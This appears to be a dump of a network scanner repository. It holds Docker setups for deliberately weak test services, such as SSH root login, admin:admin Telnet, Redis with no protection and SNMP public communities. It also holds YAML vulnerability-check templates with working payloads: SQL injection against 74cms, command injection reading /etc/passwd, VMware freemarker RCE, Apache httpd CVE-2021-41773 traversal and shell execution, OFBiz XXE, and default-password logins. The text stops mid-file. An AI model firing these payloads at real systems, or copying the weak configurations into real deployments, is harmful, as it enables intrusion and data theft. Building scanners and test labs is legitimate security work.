13 | COPY my.cnf /etc/mysql/conf.d/my.cnf
14 |
15 | # 健康检查
16 | HEALTHCHECK --interval=30s --timeout=3s \
17 | CMD mysql -uroot -p"${MYSQL_ROOT_PASSWORD}" -e "SELECT 1" || exit 1
--------------------------------------------------------------------------------
/TestDocker/MySQL/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t mysql-server .
2 | docker run -d -p 3306:3306 --name mysql-container mysql-server
--------------------------------------------------------------------------------
/TestDocker/MySQL/my.cnf:
--------------------------------------------------------------------------------
1 | [mysqld]
2 | bind-address = 0.0.0.0
--------------------------------------------------------------------------------
/TestDocker/Neo4j/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM neo4j:4.4
2 |
3 | ENV NEO4J_AUTH=neo4j/123456
4 | ENV NEO4J_dbms_security_procedures_unrestricted=apoc.*
5 | ENV NEO4J_dbms_security_auth_enabled=true
6 |
7 | EXPOSE 7474 7687
8 |
9 | CMD ["neo4j"]
--------------------------------------------------------------------------------
/TestDocker/Neo4j/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | neo4j:
4 | image: neo4j:4.4
5 | ports:
6 | - "7474:7474"
7 | - "7687:7687"
8 | environment:
9 | - NEO4J_AUTH=neo4j/123456
10 | - NEO4J_dbms_security_auth_enabled=true
11 | container_name: neo4j-weak
--------------------------------------------------------------------------------
/TestDocker/Oracle/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用Oracle官方容器镜像
2 | FROM container-registry.oracle.com/database/express:21.3.0-xe
3 |
4 | # 设置环境变量
5 | ENV ORACLE_PWD=123456
6 | ENV ORACLE_CHARACTERSET=AL32UTF8
7 |
8 | # 开放1521端口
9 | EXPOSE 1521 5500
10 |
11 | # 健康检查
12 | HEALTHCHECK --interval=30s --timeout=30s --start-period=5m --retries=3 \
13 | CMD nc -z localhost 1521 || exit 1
--------------------------------------------------------------------------------
/TestDocker/Oracle/README.txt:
--------------------------------------------------------------------------------
1 | 首先需要在Oracle Container Registry网站注册并接受许可协议:
2 | https://container-registry.oracle.com
3 |
4 | docker login container-registry.oracle.com
5 |
6 | docker build -t oracle-db .
7 |
8 | docker run -d \
9 | -p 1521:1521 \
10 | --name oracle-container \
11 | oracle-db
--------------------------------------------------------------------------------
/TestDocker/POP3/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t pop3-test .
2 | docker run -d --name pop3-server -p 110:110 -p 995:995 pop3-test
--------------------------------------------------------------------------------
/TestDocker/Postgre/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用PostgreSQL官方镜像
2 | FROM postgres:latest
3 |
4 | # 设置环境变量
5 | ENV POSTGRES_USER=postgres
6 | ENV POSTGRES_PASSWORD=123456
7 | ENV POSTGRES_DB=mydb
8 |
9 | # 开放5432端口
10 | EXPOSE 5432
11 |
12 | # 健康检查
13 | HEALTHCHECK --interval=30s --timeout=3s \
14 | CMD pg_isready -U postgres || exit 1
--------------------------------------------------------------------------------
/TestDocker/Postgre/README.md:
--------------------------------------------------------------------------------
1 | docker build -t postgres-server .
2 | docker run -d \
3 | -p 5432:5432 \
4 | --name postgres-container \
5 | postgres-server
--------------------------------------------------------------------------------
/TestDocker/RabbitMQ/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM rabbitmq:3-management
2 |
3 | # 环境变量设置默认的用户名和密码
4 | ENV RABBITMQ_DEFAULT_USER=admin
5 | ENV RABBITMQ_DEFAULT_PASS=123456
6 |
7 | # 开放标准端口
8 | # 5672: AMQP 协议端口
9 | # 15672: HTTP API 端口和管理UI
10 | EXPOSE 5672 15672
--------------------------------------------------------------------------------
/TestDocker/RabbitMQ/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t rabbitmq-weak .
2 | docker run -d --name rabbitmq-test -p 5672:5672 -p 15672:15672 rabbitmq-weak
--------------------------------------------------------------------------------
/TestDocker/Redis/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t redis-server .
2 | docker run -d \
3 | -p 6379:6379 \
4 | --name redis-container \
5 | redis-server
--------------------------------------------------------------------------------
/TestDocker/Redis/redis.conf:
--------------------------------------------------------------------------------
1 | bind 0.0.0.0
2 | port 6379
3 | protected-mode no
4 | dir /data
5 | daemonize no
--------------------------------------------------------------------------------
/TestDocker/Rsync/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t rsync-test .
2 | docker run -d --name rsync-server -p 873:873 rsync-test
--------------------------------------------------------------------------------
/TestDocker/SMTP/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t smtp-weak .
2 | docker run -d --name smtp-test -p 25:25 smtp-weak
--------------------------------------------------------------------------------
/TestDocker/SMTP/start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | service postfix start
3 | tail -f /var/log/mail.log
--------------------------------------------------------------------------------
/TestDocker/SNMP/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:20.04
2 |
3 | # 安装SNMP服务
4 | RUN apt-get update && \
5 | DEBIAN_FRONTEND=noninteractive apt-get install -y snmpd && \
6 | rm -rf /var/lib/apt/lists/*
7 |
8 | # 备份原配置
9 | RUN cp /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.orig
10 |
11 | # 创建新的配置文件
12 | RUN echo "rocommunity public default" > /etc/snmp/snmpd.conf && \
13 | echo "rocommunity private default" >> /etc/snmp/snmpd.conf && \
14 | echo "rocommunity cisco default" >> /etc/snmp/snmpd.conf && \
15 | echo "rocommunity community default" >> /etc/snmp/snmpd.conf && \
16 | # 允许从任何地址访问
17 | echo "agentAddress udp:161,udp6:[::1]:161" >> /etc/snmp/snmpd.conf
18 |
19 | # 开放SNMP端口
20 | EXPOSE 161/udp
21 |
22 | # 启动SNMP服务
23 | CMD ["snmpd", "-f", "-Lo", "-C", "-c", "/etc/snmp/snmpd.conf"]
--------------------------------------------------------------------------------
/TestDocker/SNMP/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t snmp-weak .
2 | docker run -d --name snmp-test -p 161:161/udp snmp-weak
--------------------------------------------------------------------------------
/TestDocker/SSH/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用Ubuntu最新版本作为基础镜像
2 | FROM ubuntu:latest
3 |
4 | # 安装必要的软件包
5 | RUN apt-get update && apt-get install -y \
6 | openssh-server \
7 | && rm -rf /var/lib/apt/lists/*
8 |
9 | # 创建SSH所需的目录
10 | RUN mkdir /var/run/sshd
11 |
12 | # 允许root用户SSH登录并设置密码
13 | RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
14 | RUN echo 'root:Aa123456789' | chpasswd
15 |
16 | # 开放22端口
17 | EXPOSE 22
18 |
19 | # 启动SSH服务
20 | CMD ["/usr/sbin/sshd", "-D"]
--------------------------------------------------------------------------------
/TestDocker/SSH/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t ubuntu-ssh .
2 | docker run -d -p 2222:22 ubuntu-ssh
--------------------------------------------------------------------------------
/TestDocker/Telnet/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM busybox:latest
2 |
3 | # 安装必要的包
4 | RUN ["busybox", "telnetd", "--help"]
5 |
6 | # 创建测试用户
7 | RUN adduser -D -h /home/test test && \
8 | echo "test:123456" | chpasswd
9 |
10 | # 创建弱密码管理员
11 | RUN adduser -D -h /home/admin admin && \
12 | echo "admin:admin" | chpasswd
13 |
14 | # 暴露 Telnet 端口
15 | EXPOSE 23
16 |
17 | # 启动 Telnet 服务
18 | CMD ["busybox", "telnetd", "-F", "-l", "/bin/sh"]
--------------------------------------------------------------------------------
/TestDocker/Telnet/README.md:
--------------------------------------------------------------------------------
1 | docker build -t telnet-test .
2 | docker run -d -p 23:23 --name telnet-server telnet-test
--------------------------------------------------------------------------------
/TestDocker/Tomcat/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM tomcat:9.0-jdk8
2 |
3 | # 删除默认应用
4 | RUN rm -rf /usr/local/tomcat/webapps/*
5 |
6 | # 复制tomcat-users.xml配置文件
7 | COPY tomcat-users.xml /usr/local/tomcat/conf/
8 |
9 | # 允许远程访问manager
10 | COPY context.xml /usr/local/tomcat/webapps.dist/manager/META-INF/
11 | COPY context.xml /usr/local/tomcat/webapps.dist/host-manager/META-INF/
12 |
13 | # 复制默认应用
14 | RUN cp -r /usr/local/tomcat/webapps.dist/* /usr/local/tomcat/webapps/
15 |
16 | EXPOSE 8080
17 | CMD ["catalina.sh", "run"]
--------------------------------------------------------------------------------
/TestDocker/Tomcat/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t tomcat-weak .
2 | docker run -d --name tomcat-test -p 8080:8080 tomcat-weak
--------------------------------------------------------------------------------
/TestDocker/Tomcat/context.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
5 |
--------------------------------------------------------------------------------
/TestDocker/VNC/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t vnc-server .
2 | docker run -d -p 5901:5901 vnc-server
--------------------------------------------------------------------------------
/TestDocker/VNC/supervisord.conf:
--------------------------------------------------------------------------------
1 | [supervisord]
2 | nodaemon=true
3 |
4 | [program:vnc]
5 | command=/usr/bin/vncserver :1 -geometry 1280x800 -depth 24
6 | user=vncuser
7 | autostart=true
8 | autorestart=true
--------------------------------------------------------------------------------
/TestDocker/Weblogic/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM container-registry.oracle.com/middleware/weblogic:12.2.1.4-dev
2 |
3 | # 环境变量
4 | ENV DOMAIN_NAME="base_domain" \
5 | ADMIN_PORT="7001" \
6 | ADMIN_NAME="weblogic" \
7 | ADMIN_PASSWORD="weblogic123" \
8 | PRODUCTION_MODE="dev" \
9 | DOMAIN_HOME="/u01/oracle/user_projects/domains/base_domain"
10 |
11 | USER oracle
12 |
13 | # 创建域配置脚本
14 | COPY --chown=oracle:oracle create-domain.py /u01/oracle/
15 | COPY --chown=oracle:oracle start.sh /u01/oracle/
16 | RUN chmod +x /u01/oracle/start.sh
17 |
18 | EXPOSE 7001 7002
19 |
20 | CMD ["/u01/oracle/start.sh"]
--------------------------------------------------------------------------------
/TestDocker/Weblogic/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t weblogic-weak .
2 | docker run -d --name weblogic-test -p 7001:7001 -p 7002:7002 weblogic-weak
--------------------------------------------------------------------------------
/TestDocker/Weblogic/create-domain.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | # 读取模板
4 | readTemplate("/u01/oracle/wlserver/common/templates/wls/wls.jar")
5 |
6 | # 配置管理服务器
7 | cd('/Security/base_domain/User/weblogic')
8 | cmo.setPassword('weblogic123')
9 |
10 | # 设置域名称和路径
11 | cd('/')
12 | cmo.setName('base_domain')
13 | setOption('DomainName', 'base_domain')
14 | setOption('ServerStartMode', 'dev')
15 | setOption('OverwriteDomain', 'true')
16 |
17 | # 配置管理服务器
18 | cd('/Servers/AdminServer')
19 | set('ListenAddress', '')
20 | set('ListenPort', 7001)
21 |
22 | # 写入域配置
23 | writeDomain('/u01/oracle/user_projects/domains/base_domain')
24 | closeTemplate()
25 |
26 | exit()
--------------------------------------------------------------------------------
/TestDocker/Weblogic/start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # 创建域
4 | wlst.sh -skipWLSModuleScanning /u01/oracle/create-domain.py
5 |
6 | # 等待域创建完成
7 | sleep 5
8 |
9 | # 启动服务器
10 | /u01/oracle/user_projects/domains/base_domain/bin/startWebLogic.sh
--------------------------------------------------------------------------------
/WebScan/pocs/74cms-sqli-1.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli-1
2 | set:
3 | rand: randomInt(200000000, 210000000)
4 | rules:
5 | - method: POST
6 | path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
7 | headers:
8 | Content-Type: 'text/xml'
9 | body: ]>&test;111112331%' union select md5({{rand}})#
10 | follow_redirects: false
11 | expression: |
12 | response.body.bcontains(bytes(md5(string(rand))))
13 | detail:
14 | author: betta(https://github.com/betta-cyber)
15 | links:
16 | - https://www.uedbox.com/post/29340
17 |
--------------------------------------------------------------------------------
/WebScan/pocs/74cms-sqli-2.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli-2
2 | set:
3 | rand: randomInt(200000000, 210000000)
4 | rules:
5 | - method: GET
6 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
7 | expression: |
8 | response.body.bcontains(bytes(md5(string(rand))))
9 | detail:
10 | author: rexus
11 | links:
12 | - https://www.uedbox.com/post/30019/
13 |
--------------------------------------------------------------------------------
/WebScan/pocs/74cms-sqli.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli
2 | rules:
3 | - method: GET
4 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
5 | expression: |
6 | response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
7 | detail:
8 | author: jinqi
9 | links:
10 | - https://www.t00ls.net/articles-54436.html
11 |
--------------------------------------------------------------------------------
/WebScan/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE
2 | rules:
3 | - method: GET
4 | path: /jbossmq-httpil/HTTPServerILServlet
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL')
7 | detail:
8 | author: mamba
9 | description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号"
10 | links:
11 | - https://github.com/chaosec2021
12 |
--------------------------------------------------------------------------------
/WebScan/pocs/CVE-2022-22954-VMware-RCE.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-CVE-2022-22954-VMware-RCE
2 | rules:
3 | - method: GET
4 | path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d
5 | expression: |
6 | response.status == 400 && "device id:".bmatches(response.body)
7 | detail:
8 | author: mamba
9 | description: "CVE-2022-22954-VMware-RCE by chaosec公众号"
10 | links:
11 | - https://github.com/chaosec2021
12 |
--------------------------------------------------------------------------------
/WebScan/pocs/Hotel-Internet-Manage-RCE.yml:
--------------------------------------------------------------------------------
1 | name: Hotel-Internet-Manage-RCE
2 | rules:
3 | - method: GET
4 | path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b"parent.doTestResult")
7 | detail:
8 | author: test
9 | Affected Version: "Hotel Internet Billing & Operation Support System"
10 | links:
11 | - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
12 |
13 |
--------------------------------------------------------------------------------
/WebScan/pocs/active-directory-certsrv-detect.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-active-directory-certsrv-detect
2 | rules:
3 | - method: GET
4 | path: /certsrv/certrqad.asp
5 | follow_redirects: false
6 | expression: |
7 | response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
8 | detail:
9 | author: AgeloVito
10 | links:
11 | - https://www.cnblogs.com/EasonJim/p/6859345.html
12 |
--------------------------------------------------------------------------------
/WebScan/pocs/activemq-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-activemq-default-password
2 | rules:
3 | - method: GET
4 | path: /admin/
5 | expression: |
6 | response.status == 401 && response.body.bcontains(b"Unauthorized")
7 | - method: GET
8 | path: /admin/
9 | headers:
10 | Authorization: Basic YWRtaW46YWRtaW4=
11 | expression: |
12 | response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"Broker
")
13 | detail:
14 | author: pa55w0rd(www.pa55w0rd.online/)
15 | links:
16 | - https://blog.csdn.net/ge00111/article/details/72765210
--------------------------------------------------------------------------------
/WebScan/pocs/airflow-unauth.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-airflow-unauth
2 | rules:
3 | - method: GET
4 | path: /admin/
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"DAGs
")
7 | detail:
8 | author: pa55w0rd(www.pa55w0rd.online/)
9 | links:
10 | - http://airflow.apache.org/
11 |
--------------------------------------------------------------------------------
/WebScan/pocs/alibaba-canal-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-alibaba-canal-default-password
2 | rules:
3 | - method: POST
4 | path: /api/v1/user/login
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
7 | - method: POST
8 | path: /api/v1/user/login
9 | headers:
10 | Content-Type: application/json
11 | body: >-
12 | {"username":"admin","password":"123456"}
13 | follow_redirects: false
14 | expression: |
15 | response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
16 | detail:
17 | author: jweny(https://github.com/jweny)
18 | links:
19 | - https://www.cnblogs.com/xiexiandong/p/12888582.html
20 |
--------------------------------------------------------------------------------
/WebScan/pocs/alibaba-canal-info-leak.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-alibaba-canal-info-leak
2 | rules:
3 | - method: GET
4 | path: /api/v1/canal/config/1/1
5 | follow_redirects: false
6 | expression: |
7 | response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
8 | detail:
9 | author: Aquilao(https://github.com/Aquilao)
10 | info: alibaba Canal info leak
11 | links:
12 | - https://my.oschina.net/u/4581879/blog/4753320
--------------------------------------------------------------------------------
/WebScan/pocs/alibaba-nacos.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-alibaba-nacos
2 | rules:
3 | - method: GET
4 | path: /nacos/
5 | follow_redirects: true
6 | expression: |
7 | response.body.bcontains(bytes("Nacos"))
8 | detail:
9 | author: AgeloVito
10 | info: alibaba-nacos
11 | login: nacos/nacos
12 | links:
13 | - https://blog.csdn.net/caiqiiqi/article/details/112005424
14 |
--------------------------------------------------------------------------------
/WebScan/pocs/apache-ambari-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-ambari-default-password
2 | rules:
3 | - method: GET
4 | path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
5 | headers:
6 | Authorization: Basic YWRtaW46YWRtaW4=
7 | expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
8 | detail:
9 | author: wulalalaaa(https://github.com/wulalalaaa)
10 | links:
11 | - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
12 |
--------------------------------------------------------------------------------
/WebScan/pocs/apache-axis-webservice-detect.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-axis-webservice-detect
2 | sets:
3 | path:
4 | - services
5 | - servlet/AxisaxiServlet
6 | - servlet/AxisServlet
7 | - services/listServices
8 | - services/FreeMarkerService
9 | - services/AdminService
10 | - axis/services
11 | - axis2/services
12 | - axis/servlet/AxisServlet
13 | - axis2/servlet/AxisServlet
14 | - axis2/services/listServices
15 | - axis/services/FreeMarkerService
16 | - axis/services/AdminService
17 | rules:
18 | - method: GET
19 | path: /{{path}}
20 | expression: |
21 | response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl">')
22 | detail:
23 | author: AgeloVito
24 | links:
25 | - https://paper.seebug.org/1489
26 |
--------------------------------------------------------------------------------
/WebScan/pocs/apache-httpd-cve-2021-41773-path-traversal.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
2 | groups:
3 | cgibin:
4 | - method: GET
5 | path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
6 | expression: |
7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
8 | icons:
9 | - method: GET
10 | path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
11 | expression: |
12 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
13 | detail:
14 | author: JingLing(https://github.com/shmilylty)
15 | links:
16 | - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
--------------------------------------------------------------------------------
/WebScan/pocs/apache-httpd-cve-2021-41773-rce.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce
2 | set:
3 | r1: randomInt(800000000, 1000000000)
4 | r2: randomInt(800000000, 1000000000)
5 | rules:
6 | - method: POST
7 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
8 | body: echo;expr {{r1}} + {{r2}}
9 | expression: |
10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
11 | detail:
12 | author: B1anda0(https://github.com/B1anda0)
13 | links:
14 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
15 |
--------------------------------------------------------------------------------
/WebScan/pocs/apache-kylin-unauth-cve-2020-13937.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937
2 | rules:
3 | - method: GET
4 | path: /kylin/api/admin/config
5 | expression: |
6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
7 | detail:
8 | author: JingLing(github.com/shmilylty)
9 | links:
10 | - https://s.tencent.com/research/bsafe/1156.html
11 |
--------------------------------------------------------------------------------
/WebScan/pocs/apache-nifi-api-unauthorized-access.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-nifi-api-unauthorized-access
2 | manual: true
3 | transport: http
4 | rules:
5 | - method: GET
6 | path: /nifi-api/flow/current-user
7 | follow_redirects: false
8 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
9 | detail:
10 | author: wulalalaaa(https://github.com/wulalalaaa)
11 | links:
12 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
13 |
--------------------------------------------------------------------------------
/WebScan/pocs/apache-ofbiz-cve-2018-8033-xxe.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
2 | rules:
3 | - method: POST
4 | path: /webtools/control/xmlrpc
5 | headers:
6 | Content-Type: application/xml
7 | body: >-
8 | ]>&disclose;
9 | follow_redirects: false
10 | expression: >
11 | response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body)
12 | detail:
13 | author: su(https://suzzz112113.github.io/#blog)
14 | links:
15 | - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
16 |
--------------------------------------------------------------------------------
/WebScan/pocs/aspcms-backend-leak.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-aspcms-backend-leak
2 | rules:
3 | - method: GET
4 | path: /plug/oem/AspCms_OEMFun.asp
5 | expression: |
6 | response.status == 200 && "